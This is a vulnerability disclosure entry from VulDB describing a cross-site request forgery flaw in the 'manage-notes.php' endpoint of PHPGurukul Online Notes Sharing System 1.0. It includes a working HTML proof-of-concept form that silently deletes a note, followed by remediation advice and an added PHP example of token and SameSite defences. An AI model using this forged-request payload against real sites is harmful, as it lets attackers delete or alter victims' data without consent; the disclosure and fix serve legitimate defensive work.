Submit #255757: PHPGurukul Online Notes Sharing System 1.0 Cross Site Request Forgery

Title: PHPGurukul Online Notes Sharing System 1.0 Cross Site Request Forgery

Description:

Bug Description: A Cross Site Request Forgery (CSRF) vulnerability in "/user/manage-notes.php" endpoint of Online Notes Sharing System 1.0 allows attackers to "Delete" Notes via a crafted html request.

Steps to Reproduce:

# Exploit Title: Cross Site Request Forgery (CSRF) vulnerability in PHPGurukul Online Notes Sharing System
# Date: 20-12-2023
# Exploit Author: dhabaleshwardas
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/online-notes-sharing-system-using-php-and-mysql/
# Version: 1.0
# Tested on: firefox/chrome/brave
# CVE :

To reproduce the attack:

1- Head to the http://localhost/onss/user/manage-notes.php endpoint after logging into the admin account.

2- Here you can see that we want to delete the 3rd subject "adsadas". So we wrote an HTML code to delete it.

    <html>
      <!-- CSRF PoC - generated by Burp Suite Professional -->
      <body>
        <script>history.pushState('', '', '/')</script>
        <form action="http://localhost/onss/user/manage-notes.php">
          <input type="hidden" name="delid" value="11" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>

3- We'll then execute this HTML code and we successfully see that the Data has been deleted successfully.

4- This shows that the endpoint "/user/manage-notes.php" is vulnerable to CSRF attack.

5- CSRF attacks can lead to unauthorized actions being performed on behalf of a user. An attacker could manipulate data within the application, leading to the creation, modification, or deletion of records.

Remediation:

1- Implement anti-CSRF tokens (also known as CSRF tokens or synchronizer tokens) in web forms. These tokens are unique per session and are embedded in the HTML form. The server validates the token with each form submission, ensuring that the request is legitimate.

2- Set the SameSite attribute on cookies to control when they are sent with cross-origin requests. This helps mitigate the risk of CSRF by preventing the automatic inclusion of cookies in cross-site requests.
Source: https://github.com/dhabaleshwar/Open-Source-Vulnerabilities/blob/main/csrf_delete_notes.md
User: dhabaleshwar (UID 58737)
Submission: 2023-12-20 17:29 (2 years ago)
Moderation: 2023-12-21 17:06 (24 hours later)
Status: Accepted
VulDB entry: 248738 [PHPGurukul Online Notes Sharing System 1.0 /user/manage-notes.php delid cross-site request forgery]
Points: 20
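
The two remediation steps from the description, applied to a delete handler that takes the `delid` parameter; this is an added example, not PHPGurukul's code or the reporter's. The `csrf_token` field name, the function names and PHP 7.3+ (for the `samesite` cookie option) are assumptions.

```php
<?php
// Added example, not PHPGurukul code. Only the 'delid' parameter and the
// manage-notes.php page name come from the report; the rest is assumed.

// Remediation 2: SameSite on the session cookie, set before session_start().
session_set_cookie_params([
    'lifetime' => 0,
    'path'     => '/',
    'httponly' => true,
    'samesite' => 'Strict',
]);
session_start();

// Remediation 1: one unpredictable synchronizer token per session.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Returns the note id to delete, or null when the request must be rejected.
function validated_delete_id(string $method, array $post): ?int
{
    if ($method !== 'POST') {
        return null; // a state change is never accepted from a GET request
    }
    $sent = $post['csrf_token'] ?? '';
    if (!is_string($sent) || !hash_equals(csrf_token(), $sent)) {
        return null; // token missing, malformed or not this session's
    }
    $id = filter_var($post['delid'] ?? null, FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

$method = $_SERVER['REQUEST_METHOD'] ?? 'GET';
if ($method === 'POST') {
    $id = validated_delete_id($method, $_POST);
    if ($id === null) {
        http_response_code(403);
        exit('Request rejected');
    }
    // Delete note $id here, scoped to the logged-in user (application-specific).
}
?>
<form method="post" action="manage-notes.php">
  <input type="hidden" name="csrf_token" value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES) ?>">
  <input type="hidden" name="delid" value="11">
  <button type="submit">Delete</button>
</form>
```

With this handler, the form in the report is rejected twice over: it submits `delid` by GET, and it cannot supply the session's token.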
